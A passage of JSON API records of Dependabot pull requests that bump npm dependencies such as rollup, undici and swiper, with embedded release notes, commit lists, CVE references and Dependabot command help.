href=\"https://github.com/JoaoBrlt\"\u003e\u003ccode\u003e@​JoaoBrlt\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6307\"\u003e#6307\u003c/a\u003e: chore(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6308\"\u003e#6308\u003c/a\u003e: chore(deps): update dependency lru-cache to v11 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6309\"\u003e#6309\u003c/a\u003e: chore(deps): update dependency vite to v8 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6310\"\u003e#6310\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6311\"\u003e#6311\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6312\"\u003e#6312\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.59.0\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2026-02-22\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThrow when the generated bundle contains paths that would leave the output directory (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6276\"\u003e#6276\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/6ecd69fb2ce736c8aabb50829edd227d1792c957\"\u003e\u003ccode\u003e6ecd69f\u003c/code\u003e\u003c/a\u003e 4.60.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/6b725b9f0aae80e4ca4bf3e7b9763b153b850d8b\"\u003e\u003ccode\u003e6b725b9\u003c/code\u003e\u003c/a\u003e feat: external only Source Phase imports support (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6279\"\u003e#6279\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/0cba9e079e1d6e56882558827b37557f36c52966\"\u003e\u003ccode\u003e0cba9e0\u003c/code\u003e\u003c/a\u003e 4.59.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/4eeea29bd42b6abf3dad53b760f53750cd698872\"\u003e\u003ccode\u003e4eeea29\u003c/code\u003e\u003c/a\u003e Pin Vite\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/1cd49ae2a2a3de50627e2790b17e3c8704012626\"\u003e\u003ccode\u003e1cd49ae\u003c/code\u003e\u003c/a\u003e fix: fix chunk assignment for deoptimized module with dynamic import (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6306\"\u003e#6306\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/c9dabc3744b5316a1a08c85b65fce73d465e5453\"\u003e\u003ccode\u003ec9dabc3\u003c/code\u003e\u003c/a\u003e Downgrade Vite\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/d46200fd92b083d0997c0216a21f5bcdc5e6efea\"\u003e\u003ccode\u003ed46200f\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency vite to v8 (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6309\"\u003e#6309\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/aa6c853da554cd8b56b48e94fcfc21a5b027b271\"\u003e\u003ccode\u003eaa6c853\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency lru-cache to v11 (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6308\"\u003e#6308\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/4208811aa6600f81d94a746a01bd0ff861718578\"\u003e\u003ccode\u003e4208811\u003c/code\u003e\u003c/a\u003e chore(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6312\"\u003e#6312\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/5348a82cee5e07a39164fb78ce9d69bfc557d341\"\u003e\u003ccode\u003e5348a82\u003c/code\u003e\u003c/a\u003e chore(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6311\"\u003e#6311\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/rollup/rollup/compare/v4.21.0...v4.60.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for rollup since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `undici` from 5.28.3 to 5.29.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodejs/undici/releases\"\u003eundici's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.29.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix tests in v5.x for Node 20 by \u003ca href=\"https://github.com/mcollina\"\u003e\u003ccode\u003e@​mcollina\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nodejs/undici/pull/4104\"\u003enodejs/undici#4104\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved clients with unrecoverable errors from the Pool \u003ca href=\"https://redirect.github.com/nodejs/undici/pull/4088\"\u003enodejs/undici#4088\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nodejs/undici/compare/v5.28.5...v5.29.0\"\u003ehttps://github.com/nodejs/undici/compare/v5.28.5...v5.29.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.28.5\u003c/h2\u003e\n\u003ch1\u003e⚠️ Security Release ⚠️\u003c/h1\u003e\n\u003cp\u003eFixes CVE CVE-2025-22150 \u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-c76h-2ccp-4975\"\u003ehttps://github.com/nodejs/undici/security/advisories/GHSA-c76h-2ccp-4975\u003c/a\u003e (embargoed until 22-01-2025).\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nodejs/undici/compare/v5.28.4...v5.28.5\"\u003ehttps://github.com/nodejs/undici/compare/v5.28.4...v5.28.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.28.4\u003c/h2\u003e\n\u003ch2\u003e:warning: Security Release :warning:\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-m4v8-wqvr-p9f7\"\u003ehttps://github.com/nodejs/undici/security/advisories/GHSA-m4v8-wqvr-p9f7\u003c/a\u003e CVE-2024-30260\u003c/li\u003e\n\u003cli\u003eFixes \u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-9qxr-qj54-h672\"\u003ehttps://github.com/nodejs/undici/security/advisories/GHSA-9qxr-qj54-h672\u003c/a\u003e CVE-2024-30261\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nodejs/undici/compare/v5.28.3...v5.28.4\"\u003ehttps://github.com/nodejs/undici/compare/v5.28.3...v5.28.4\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/9528f6853a72a637823e863f1dd12ec47a3fc9e7\"\u003e\u003ccode\u003e9528f68\u003c/code\u003e\u003c/a\u003e Bumped v5.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/f1d75a4e107866110c48003f00e5d0de52ef2cce\"\u003e\u003ccode\u003ef1d75a4\u003c/code\u003e\u003c/a\u003e increase timeout for redirect test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/2d31ed61f7ca12ef6d89a323dc236346364ac379\"\u003e\u003ccode\u003e2d31ed6\u003c/code\u003e\u003c/a\u003e remove fuzzing tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/6b36d49cb2fa14217baa11b6fd27ee20b661ea4c\"\u003e\u003ccode\u003e6b36d49\u003c/code\u003e\u003c/a\u003e fix redirect test in Node v16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/648dd8f7ba3654db09a095361a167e3576db8cd0\"\u003e\u003ccode\u003e648dd8f\u003c/code\u003e\u003c/a\u003e more fix for the wpt runner on Windows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/a0516bae59b6aa8aa8124f9ae5cfed79541d10e2\"\u003e\u003ccode\u003ea0516ba\u003c/code\u003e\u003c/a\u003e don't use internal header state for cookies (\u003ca href=\"https://redirect.github.com/nodejs/undici/issues/3295\"\u003e#3295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/87ce4af0e58657506cedb2d07a5ba24f964b733f\"\u003e\u003ccode\u003e87ce4af\u003c/code\u003e\u003c/a\u003e fix test/client for node 20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/c2c8fd55b778267ad8b2e9ee04218c038a5d02af\"\u003e\u003ccode\u003ec2c8fd5\u003c/code\u003e\u003c/a\u003e fix: accept v20 SSL specific error for alpn selection in http/2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/82200bd10b7073ac235f8fc48d4daa82b350cd4c\"\u003e\u003ccode\u003e82200bd\u003c/code\u003e\u003c/a\u003e [v6.x] fix wpts on windows (\u003ca href=\"https://redirect.github.com/nodejs/undici/issues/4093\"\u003e#4093\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/47546fa68d04eec5b96ab93225c3bc08b77cd94f\"\u003e\u003ccode\u003e47546fa\u003c/code\u003e\u003c/a\u003e test: fix windows wpt (\u003ca href=\"https://redirect.github.com/nodejs/undici/issues/4050\"\u003e#4050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nodejs/undici/compare/v5.28.3...v5.29.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/joelvaneenwyk/gh-action-setup-env/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/joelvaneenwyk/gh-action-setup-env/pull/27","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/joelvaneenwyk%2Fgh-action-setup-env/issues/27","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/27/packages"},{"uuid":"4137242295","node_id":"PR_kwDODZOtbM7NbmAX","number":164,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 1 directory with 22 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":["polaroidkidd"],"locked":false,"comments_count":2,"pull_request":true,"closed_at":"2026-04-13T10:29:38.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-25T17:39:37.000Z","updated_at":"2026-04-13T10:29:46.000Z","time_to_close":1615801,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":22,"packages":[{"name":"swiper","old_version":"11.1.0","new_version":"12.1.2","repository_url":"https://github.com/nolimits4web/Swiper"},{"name":"svelte","old_version":"4.2.12","new_version":"5.53.5","repository_url":"https://github.com/sveltejs/svelte"},{"name":"sveltekit-superforms","old_version":"1.13.4","new_version":"2.27.4","repository_url":"https://github.com/ciscoheat/sveltekit-superforms"},{"name":"@octokit/endpoint","old_version":"9.0.5","new_version":"9.0.6","repository_url":"https://github.com/octokit/endpoint.js"},{"name":"@octokit/plugin-paginate-rest","old_version":"9.2.1","new_version":"9.2.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@octokit/request-error","old_version":"5.1.0","new_version":"5.1.1","repository_url":"https://github.com/octokit/request-error.js"},{"name":"@octokit/request","old_version":"8.3.1","new_version":"8.4.1","repository_url":"https://github.com/octokit/request.js"},{"name":"ajv","old_version":"6.12.6","new_version":"6.14.0","repository_url":"https://github.com/ajv-validator/ajv"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.12","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"cross-spawn","old_version":"7.0.3","new_version":"7.0.6","repository_url":"https://github.com/moxystudio/node-cross-spawn"},{"name":"diff","old_version":"5.2.0","new_version":"5.2.2","repository_url":"https://github.com/kpdecker/jsdiff"},{"name":"flatted","old_version":"3.3.1","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"immutable","old_version":"4.3.5","new_version":"4.3.8","repository_url":"https://github.com/immutable-js/immutable-js"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"jws","old_version":"3.2.2","new_version":"3.2.3","repository_url":"https://github.com/brianloveswords/node-jws"},{"name":"lodash","old_version":"4.17.21","new_version":"4.17.23","repository_url":"https://github.com/lodash/lodash"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"nanoid","old_version":"3.3.7","new_version":"3.3.11","repository_url":"https://github.com/ai/nanoid"},{"name":"rollup","old_version":"4.14.1","new_version":"4.60.0","repository_url":"https://github.com/rollup/rollup"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 20 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [swiper](https://github.com/nolimits4web/Swiper) | `11.1.0` | `12.1.2` |\n| [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte) | `4.2.12` | `5.53.5` |\n| [sveltekit-superforms](https://github.com/ciscoheat/sveltekit-superforms) | `1.13.4` | `2.27.4` |\n| [@octokit/endpoint](https://github.com/octokit/endpoint.js) | `9.0.5` | `9.0.6` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `9.2.1` | `9.2.2` |\n| [@octokit/request-error](https://github.com/octokit/request-error.js) | `5.1.0` | `5.1.1` |\n| [@octokit/request](https://github.com/octokit/request.js) | `8.3.1` | `8.4.1` |\n| [ajv](https://github.com/ajv-validator/ajv) | `6.12.6` | `6.14.0` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.12` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [cross-spawn](https://github.com/moxystudio/node-cross-spawn) | `7.0.3` | `7.0.6` |\n| [diff](https://github.com/kpdecker/jsdiff) | `5.2.0` | `5.2.2` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.3.1` | `3.4.2` |\n| [immutable](https://github.com/immutable-js/immutable-js) | `4.3.5` | `4.3.8` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [jws](https://github.com/brianloveswords/node-jws) | `3.2.2` | `3.2.3` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.17.23` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [nanoid](https://github.com/ai/nanoid) | `3.3.7` | `3.3.11` |\n| [rollup](https://github.com/rollup/rollup) | `4.14.1` | `4.60.0` |\n\n\nUpdates `swiper` from 11.1.0 to 12.1.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nolimits4web/Swiper/releases\"\u003eswiper's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev12.1.2\u003c/h2\u003e\n\u003cp\u003eNo release notes provided.\u003c/p\u003e\n\u003ch2\u003ev12.1.1\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ea11y:\u003c/strong\u003e fix focus in virtual mode enabled (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/30550088fd089600aec2d7f8924b88cff13abbe9\"\u003e3055008\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8147\"\u003e#8147\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e avoid double-subtracting offsets in centerInsufficientSlides (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8158\"\u003e#8158\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/60b005222a801029a4a00d319517028afba7af18\"\u003e60b0052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e prevent duplicate module initialization in constructor (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8155\"\u003e#8155\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8156\"\u003e#8156\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/07738a233b70535c36126c5b579f2bb40049da6c\"\u003e07738a2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e support boolean as a11y value (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8157\"\u003e#8157\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/6bf76d573196c61db1328350c11e2c44f5d3ec08\"\u003e6bf76d5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev12.1.0\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eautoplay:\u003c/strong\u003e broken custom delay percentages with pause/resume (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8133\"\u003e#8133\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/0afecde9781268a60a92f752ea3a3a92420e2dcf\"\u003e0afecde\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e Don't use \u003ccode\u003edata-swiper-slide-index\u003c/code\u003e for \u003ccode\u003erealIndex\u003c/code\u003e when virtual module is enabled (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8142\"\u003e#8142\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/bd957f8396f711b83dc1bc6b3d42a59e6d6539d2\"\u003ebd957f8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e Escape all CSS selector special characters (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/d35f41a85bd1793de58358d06300440e09187a6d\"\u003ed35f41a\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8135\"\u003e#8135\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e support slidesOffsetBefore and slidesOffsetAfert in cssMode (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/45b98d02b2235b0c425f8bd60ebdc04d7b1a4fbd\"\u003e45b98d0\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/7926\"\u003e#7926\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix lazy preloader removal error in react in vue (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/332f5c77005921c8a260f199cdfe6d3aa5d209a1\"\u003e332f5c7\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8149\"\u003e#8149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ethumbs:\u003c/strong\u003e update slide classes on virtual swiper update (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8141\"\u003e#8141\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/975277111b73f389043cb0ed19feee0244a80f57\"\u003e9752771\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e Add \u003ccode\u003eautoScroll\u003c/code\u003e to \u003ccode\u003ethumbs.update\u003c/code\u003e type signature (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8146\"\u003e#8146\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/5d91e6edb4ce35d70019616b51f1e380feb9a082\"\u003e5d91e6e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ezoom:\u003c/strong\u003e initialize gesture state after programmatic zoom (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8112\"\u003e#8112\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/71e9511802c34482bc8b66abda19a1a518d88d36\"\u003e71e9511\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ekeyboard:\u003c/strong\u003e add support for custom speed parameter in keyboard navigation (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8148\"\u003e#8148\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/7a4a0e5fc3c85710a37ab021328e083fc3b14e16\"\u003e7a4a0e5\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003enew snapToSlideEdge parameter (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/de3131fbf72cccbf1d1473f787ddf15c74612584\"\u003ede3131f\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8021\"\u003e#8021\u003c/a\u003e \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/4780\"\u003e#4780\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev12.0.3\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eelement:\u003c/strong\u003e fixed reference to nav arrows SVG (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/0b17ecf56bf941e4a5da2a2c171d5e16a9e4552b\"\u003e0b17ecf\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8115\"\u003e#8115\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e add 'getRotateFix' export to effect utils (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/c97ae5d0069cf3d5c745efb63ced9924a64d2453\"\u003ec97ae5d\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8114\"\u003e#8114\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev12.0.2\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enavigation:\u003c/strong\u003e add styles for when buttons set before slider (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/4588c5719d4d828548c34f456de099f621f4c709\"\u003e4588c57\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8085\"\u003e#8085\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003enavigation:\u003c/strong\u003e new \u003ccode\u003eaddIcons\u003c/code\u003e parameter to add SVG icons to nav buttons (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/b955b0c15c3b813bbda7a68cdd250f8a822015df\"\u003eb955b0c\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8088\"\u003e#8088\u003c/a\u003e \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8087\"\u003e#8087\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev12.0.1\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enavigation:\u003c/strong\u003e tweak nav styles when adjacent (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/98440d9621c2b06c1c45edf8f4103ce5125e8231\"\u003e98440d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev12.0.0\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nolimits4web/swiper/blob/master/CHANGELOG.md\"\u003eswiper's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/nolimits4web/Swiper/compare/v12.1.1...v12.1.3\"\u003e12.1.3\u003c/a\u003e (2026-03-24)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e use virtual slides 